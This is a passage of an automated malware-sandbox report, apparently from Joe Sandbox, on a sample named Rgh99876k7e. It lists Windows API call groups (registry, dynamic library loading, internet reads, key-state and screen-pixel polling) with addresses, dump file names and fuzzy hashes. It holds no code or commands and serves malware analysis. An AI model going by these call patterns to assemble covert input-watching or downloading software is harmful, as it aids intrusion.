                          • RegCloseKey.ADVAPI32(00000000), ref: 0078BBB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                          • String ID:
                          • API String ID: 826366716-0
                          • Opcode ID: 28941b8f2befef32039ea5bb8332533311a82552d9e5687f1d513d45bd270ef2
                          • Instruction ID: 10990ec220ca620360a3ca1a12d77c24da06dca8fb1a175a5aec020b3a9d6d6e
                          • Opcode Fuzzy Hash: 28941b8f2befef32039ea5bb8332533311a82552d9e5687f1d513d45bd270ef2
                          • Instruction Fuzzy Hash: 7361B571208241EFD714EF24C894E2ABBE5FF84308F54855DF4998B2A2DB39ED45CB92
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00768BCD
                          • VariantClear.OLEAUT32 ref: 00768C3E
                          • VariantClear.OLEAUT32 ref: 00768C9D
                          • VariantClear.OLEAUT32(?), ref: 00768D10
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00768D3B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType
                          • String ID:
                          • API String ID: 4136290138-0
                          • Opcode ID: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
                          • Instruction ID: fac5c2c8466684a860d424a890208650cad2e5d0e5774b5b979c110e07354f56
                          • Opcode Fuzzy Hash: 10c4aa30926a1f1bca7302fedee1914ecb7e8887c67ca77489d4f2ec030a943e
                          • Instruction Fuzzy Hash: 35515BB5A00619EFCB14CF68C894AAABBF4FF8D310B158559ED16DB350E734E911CBA0
                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00778BAE
                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00778BDA
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00778C32
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00778C57
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00778C5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String
                          • String ID:
                          • API String ID: 2832842796-0
                          • Opcode ID: f51b3da9adc83e4ca1bd28e7e27fbabb8dc413fafebc29bc5a40a5a71e0cc39b
                          • Instruction ID: 0ca512a6b5754af908934a7ef01f13fe9aaa370e07ea5dd7b97fad5e3acbcca5
                          • Opcode Fuzzy Hash: f51b3da9adc83e4ca1bd28e7e27fbabb8dc413fafebc29bc5a40a5a71e0cc39b
                          • Instruction Fuzzy Hash: 75513D75A00215DFCB05DF54C885AA9BBF5FF48314F08C499E8496B3A2CB39ED51CB91
                          APIs
                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00788F40
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00788FD0
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00788FEC
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00789032
                          • FreeLibrary.KERNEL32(00000000), ref: 00789052
                            • Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00771043,?,7529E610), ref: 0071F6E6
                            • Part of subcall function 0071F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0075FA64,00000000,00000000,?,?,00771043,?,7529E610,?,0075FA64), ref: 0071F70D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                          • String ID:
                          • API String ID: 666041331-0
                          • Opcode ID: fcdef22c87b36ef7d674861c64c863298e1efcfade26d44f3317abab7473e1f7
                          • Instruction ID: 6139136ca3023f9d7e806d8968d8df57ca22782c2140f9e927b50d89bc061c17
                          • Opcode Fuzzy Hash: fcdef22c87b36ef7d674861c64c863298e1efcfade26d44f3317abab7473e1f7
                          • Instruction Fuzzy Hash: 2C514F34640205DFCB15EF54C4848ADBBF1FF49314F488199E906AB3A2DB35ED85CB91
                          APIs
                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00796C33
                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00796C4A
                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00796C73
                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0077AB79,00000000,00000000), ref: 00796C98
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00796CC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Long$MessageSendShow
                          • String ID:
                          • API String ID: 3688381893-0
                          • Opcode ID: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
                          • Instruction ID: 386ac456419f550083c8f96c188c07b722946528268a34c4a79d107658b95568
                          • Opcode Fuzzy Hash: 742344f3f9491bf2297a6d15da8802fcfd03ba7cf343d2f364f1670bc96209d5
                          • Instruction Fuzzy Hash: 4D410235A00104AFDF25DF28DC58FA97BA5EB0A350F154369F899A72E0D379FD41CA60
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
                          • Instruction ID: ee61e565445b6ce8f33f9b46c9b7991c1f7aca6de9e4fada49d25c48b08dd36d
                          • Opcode Fuzzy Hash: 0b7ad391a4df5700f78102daf36d38b50a449235a60f21527d2679f9e34d4b9c
                          • Instruction Fuzzy Hash: A441E232A00214EFDB24DF78C984A5EB3B5EF88710F1545A8E515EB393EA35AD02CB80
                          APIs
                          • GetCursorPos.USER32(?), ref: 00719141
                          • ScreenToClient.USER32(00000000,?), ref: 0071915E
                          • GetAsyncKeyState.USER32(00000001), ref: 00719183
                          • GetAsyncKeyState.USER32(00000002), ref: 0071919D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
                          • Instruction ID: 13037d6d5f78c8aab60e537b70a0dd6137457f0badf3cf6f9fde98bc9879239c
                          • Opcode Fuzzy Hash: 6bea71714354e5a85838bb350dbc0b04af2c5dd0bd179684f37fa7ba0f57e159
                          • Instruction Fuzzy Hash: 3641903190850AFBDF099F68D858BEEB774FB45320F208215E925A32D0C7786D95DB51
                          APIs
                          • GetInputState.USER32 ref: 007738CB
                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00773922
                          • TranslateMessage.USER32(?), ref: 0077394B
                          • DispatchMessageW.USER32(?), ref: 00773955
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                          • String ID:
                          • API String ID: 2256411358-0
                          • Opcode ID: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
                          • Instruction ID: a1f7229ab3397f84c5af050531f318084c801bfa558bd877ac24d9756aad5649
                          • Opcode Fuzzy Hash: f3b86bc1ff9e4f186e4078c288fc32a4153040c051dc35d856db0d1f7b9903d5
                          • Instruction Fuzzy Hash: 0531C870505341AEEF25CB749848BB637B4AB05388F44C56AD56A82190D3BCB685EF25
                          APIs
                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0077CF38
                          • InternetReadFile.WININET(?,00000000,?,?), ref: 0077CF6F
                          • GetLastError.KERNEL32(?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFB4
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFC8
                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,0077C21E,00000000), ref: 0077CFF2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                          • String ID:
                          • API String ID: 3191363074-0
                          • Opcode ID: 86ec769f29c3cce0e4aa0df6d97b6f74882d1f69888f43eec56ab1579db341dd
                          • Instruction ID: 75b1abe5a69bf2587a15bfc7b923acd7882b3dcc692cf74227f5dd50c41f0035
                          • Opcode Fuzzy Hash: 86ec769f29c3cce0e4aa0df6d97b6f74882d1f69888f43eec56ab1579db341dd
                          • Instruction Fuzzy Hash: F1315072600605EFDF21DFA5D8849ABBBF9EF18390B10842EF50AD2141D738AE41DB60
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00761915
                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 007619C1
                          • Sleep.KERNEL32(00000000,?,?,?), ref: 007619C9
                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 007619DA
                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007619E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
                          • Instruction ID: 5279f8906151d7d9ad0e534f90edd0595dff31f2d542e0e288ae89edd62558ec
                          • Opcode Fuzzy Hash: bd84d1b9125daa27d84241b33a4ed7abafcd7cba5a5930f97f56931b58cb05c3
                          • Instruction Fuzzy Hash: 6731AD71A00259EFCB00CFA8C99DADE3BB5EB04315F548269FD22A72D1C774AD44CB90
                          APIs
                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00795745
                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0079579D
                          • _wcslen.LIBCMT ref: 007957AF
                          • _wcslen.LIBCMT ref: 007957BA
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$_wcslen
                          • String ID:
                          • API String ID: 763830540-0
                          • Opcode ID: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
                          • Instruction ID: add33c7ea94da819aeeecdf907d179e4338128d1d194a7864bad4d8a9ed9a634
                          • Opcode Fuzzy Hash: 6c2c09e6c0a549a87120d67ceda06302ba1d619d1f69f619d96b848b7d923771
                          • Instruction Fuzzy Hash: 2B21A771904628EADF21CFA0EC44EED7778FF04720F108156E929DA191D7789A85CF50
                          APIs
                          • IsWindow.USER32(00000000), ref: 00780951
                          • GetForegroundWindow.USER32 ref: 00780968
                          • GetDC.USER32(00000000), ref: 007809A4
                          • GetPixel.GDI32(00000000,?,00000003), ref: 007809B0
                          • ReleaseDC.USER32(00000000,00000003), ref: 007809E8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: b6e7d64d8528004d6d818d9ee810b456108f207aebacf566bf9acea490aaac26
                          • Instruction ID: f2e4edb95af20e7f85891a9c3f94ae7b52f556ca58356704dcc23a3eb4a1a558
                          • Opcode Fuzzy Hash: b6e7d64d8528004d6d818d9ee810b456108f207aebacf566bf9acea490aaac26
                          • Instruction Fuzzy Hash: 6921A435600204EFDB14EF68C848A6EB7E5EF48740F04C169F84A97352DB78AC04CB90
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0073CDC6
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0073CDE9
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0073CE0F
                          • _free.LIBCMT ref: 0073CE22
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0073CE31
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
                          • Instruction ID: 41105f155676e901e45b90a7001d598dd8633087503a742d50a5472cbd714c34
                          • Opcode Fuzzy Hash: 0c79aa988cd2e32ef1d70c7fc41ca1951bf4107d38fb8c91ab823a3e48dce3c7
                          • Instruction Fuzzy Hash: D90147726412187F372326B66C8CC7B796CDEC2BA0B14412EFD00E3203EA2D8D0283B4
                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00719693
                          • SelectObject.GDI32(?,00000000), ref: 007196A2
                          • BeginPath.GDI32(?), ref: 007196B9
                          • SelectObject.GDI32(?,00000000), ref: 007196E2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
                          • Instruction ID: 94282ae09931a7b78768852e37ffd2cbcd489fcf31074e99a3accc38a428c884
                          • Opcode Fuzzy Hash: 53a52104ba5152592aefadacdcdde5e6133aa6e9d6caf65e514a15a4fcb58e4e
                          • Instruction Fuzzy Hash: 5E217170802345FBDB119F68EC247E93B74BB00355F508217F550A61F1D37C6896CBA8
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
                          • Instruction ID: 6fc6a374786a4fb0526a81a6145455ec444ca43f382f292fda0fcd4001681ed5
                          • Opcode Fuzzy Hash: 880777db47845f187e0667c44965e227bac0823fede5291838a2dd94b4a199ae
                          • Instruction Fuzzy Hash: 5B01B9A1641615FBD6089520ED42FBB735DAB313A4F404020FD06AA641F76DEE20A2F0
                          APIs
                          • GetLastError.KERNEL32(?,?,?,0072F2DE,00733863,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6), ref: 00732DFD
                          • _free.LIBCMT ref: 00732E32
                          • _free.LIBCMT ref: 00732E59
                          • SetLastError.KERNEL32(00000000,00701129), ref: 00732E66
                          • SetLastError.KERNEL32(00000000,00701129), ref: 00732E6F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          • API String ID: 3170660625-0
                          • Opcode ID: 0238fd9d2b5b45ad2a9cdcaca0960e8c3f835eaf3340e906f28c7d8766590a28
                          • Instruction ID: 3e12cde1ddf6635fcc520cd89c55feeac8a7cf6f2adcf7ef6aa4170ee97c99f0
                          • Opcode Fuzzy Hash: 0238fd9d2b5b45ad2a9cdcaca0960e8c3f835eaf3340e906f28c7d8766590a28
                          • Instruction Fuzzy Hash: 8C012872285600ABFA1327757C4FE2B266DABC17B1F258029F425A22E3EF7C8C035065
                          APIs
                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?,?,0076035E), ref: 0076002B
                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760046
                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?), ref: 00760064
                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760070
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: From$Prog$FreeStringTasklstrcmpi
                          • String ID:
                          • API String ID: 3897988419-0
                          • Opcode ID: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
                          • Instruction ID: bcb9213488dffaeb946ec3f57ec8785896d1c3ce6e7323cd55144906ea090423
                          • Opcode Fuzzy Hash: f8d967573dbd411d6f2460bf3feb08289718ace8e3e87478a0f0bd7602a2b5cb
                          • Instruction Fuzzy Hash: 2B018B76600204BFDF124F68DC08FAB7AADEB447A2F148125FD06E6210E7B9DD419BA0
                          APIs
                          • QueryPerformanceCounter.KERNEL32(?), ref: 0076E997
                          • QueryPerformanceFrequency.KERNEL32(?), ref: 0076E9A5
                          • Sleep.KERNEL32(00000000), ref: 0076E9AD
                          • QueryPerformanceCounter.KERNEL32(?), ref: 0076E9B7
                          • Sleep.KERNEL32 ref: 0076E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
